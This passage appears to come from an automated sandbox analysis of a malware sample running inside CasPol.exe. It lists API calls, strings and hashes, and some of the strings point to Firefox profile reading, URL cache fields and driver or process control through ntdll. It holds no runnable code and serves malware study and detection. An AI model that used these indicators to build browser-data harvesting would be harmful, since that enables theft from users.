                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                    APIs
                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                    Strings
                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 829165378-0
                                                                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1043902810-0
                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                    APIs
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                    • String ID: ---
                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1010922700-0
                                                                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                    • String ID: |A
                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                    • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                    • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                    APIs
                                                                                                                    Strings
